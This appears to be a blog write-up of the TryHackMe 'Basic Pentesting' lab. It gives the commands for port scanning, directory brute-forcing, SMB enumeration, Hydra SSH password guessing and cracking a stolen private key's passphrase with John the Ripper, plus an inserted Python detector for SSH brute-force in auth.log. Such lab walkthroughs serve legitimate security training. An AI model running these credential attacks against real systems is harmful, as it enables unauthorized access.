Basic Pentesting — TryHackMe

Write-up

Bat_09
3 min read · Apr 2, 2021

Task 1 : Web App Testing and Privilege Escalation

>Find the services exposed by the machine

Let’s run nmap and see if it discovers anything useful!

sudo nmap -T4 -A -p- <MACHINE_IP>

nmap scan

>What is the name of the hidden directory on the web server?

To find hidden directories we can use tools like dirsearch, dirbuster or gobuster; I will use gobuster.

sudo gobuster dir -w <wordlist_path> -u http://<MACHINE_IP>/

gobuster scanning for hidden directories

We discovered the hidden directory; let’s browse to it and see what’s there!

By opening the two text files in that directory, we learn that user J has a weak password, SMB has been configured and Apache Struts 2.5.12 is running.

>User brute-forcing to find the username & password

Let’s enumerate SMB with enum4linux:

enum4linux -a <MACHINE_IP>

Here we got two users; let’s try to get the password of user jan.

We will use Hydra to crack the password of user jan.

sudo hydra -l jan -P /home/kali/rockyou.txt ssh://<MACHINE_IP>

Then log in to the machine over SSH with the cracked password of user jan.

sudo ssh jan@<MACHINE_IP>
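Seen from the defending side, a Hydra run like the one above leaves a tight burst of "Failed password" entries for one account in the target's sshd log, typically followed by an "Accepted password" once the wordlist hits. The following detector is an added example, not part of the original write-up; the auth.log lines, the threshold and the time window are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not taken from the write-up); the shape
# mirrors what OpenSSH logs while a wordlist is run against a single account.
SAMPLE_AUTH_LOG = """\
Apr  2 10:15:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 50211 ssh2
Apr  2 10:15:01 target sshd[1203]: Failed password for jan from 10.10.14.5 port 50212 ssh2
Apr  2 10:15:02 target sshd[1205]: Failed password for jan from 10.10.14.5 port 50213 ssh2
Apr  2 10:15:02 target sshd[1207]: Failed password for jan from 10.10.14.5 port 50214 ssh2
Apr  2 10:15:03 target sshd[1209]: Failed password for jan from 10.10.14.5 port 50215 ssh2
Apr  2 10:15:03 target sshd[1211]: Failed password for jan from 10.10.14.5 port 50216 ssh2
Apr  2 10:15:04 target sshd[1213]: Accepted password for jan from 10.10.14.5 port 50217 ssh2
Apr  2 11:30:45 target sshd[1402]: Failed password for kay from 192.168.1.20 port 40001 ssh2
Apr  2 11:31:10 target sshd[1405]: Accepted publickey for kay from 192.168.1.20 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_ts(ts, year=2021):
    # syslog timestamps carry no year; assume one (the constructed data is 2021)
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {(ip, user): {...}} for every source/account pair with at least
    `threshold` failed password logins inside `window_seconds`, noting whether
    a successful login followed the burst (i.e. the credential was guessed)."""
    events = defaultdict(list)  # (ip, user) -> [(time, result)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events[(m["ip"], m["user"])].append((parse_ts(m["ts"]), m["result"]))
    alerts = {}
    for key, evs in events.items():
        evs.sort()
        fails = [t for t, r in evs if r == "Failed"]
        for i in range(len(fails)):  # sliding window over failure timestamps
            j = i
            while j + 1 < len(fails) and (fails[j + 1] - fails[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i + 1 >= threshold:
                success = any(r == "Accepted" and t >= fails[i] for t, r in evs)
                alerts[key] = {"failures": j - i + 1, "success_after_burst": success}
                break
    return alerts
```

On the sample data only the jan account from 10.10.14.5 is flagged, with the success recorded; kay's single failure stays below the threshold. Rate-limiting tools such as fail2ban apply the same idea, and an "Accepted" right after a burst is the line worth paging on.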

Let’s look around the machine to find a way to access kay’s account.

We do not have the right privileges to access the password file. Let’s try to escalate to kay’s privileges. Looking around, we find the SSH keys of user kay. Copy the private key to your local machine, then generate a hash of it with ssh2john.

sudo python /usr/share/john/ssh2john.py id_rsa > new_id_rsa1

Let’s run John the Ripper to crack the passphrase of kay’s key.

sudo john --wordlist=rockyou.txt new_id_rsa1

Let’s log in as kay over SSH using the cracked private key of his account.

ssh -i id_rsa kay@<MACHINE_IP>

>What is the final password you obtain?

Now we can access the pass.bak file to obtain the final password.

All the challenges are completed, we successfully pwned the machine!!☠

Thank You!!

Happy Hacking!!
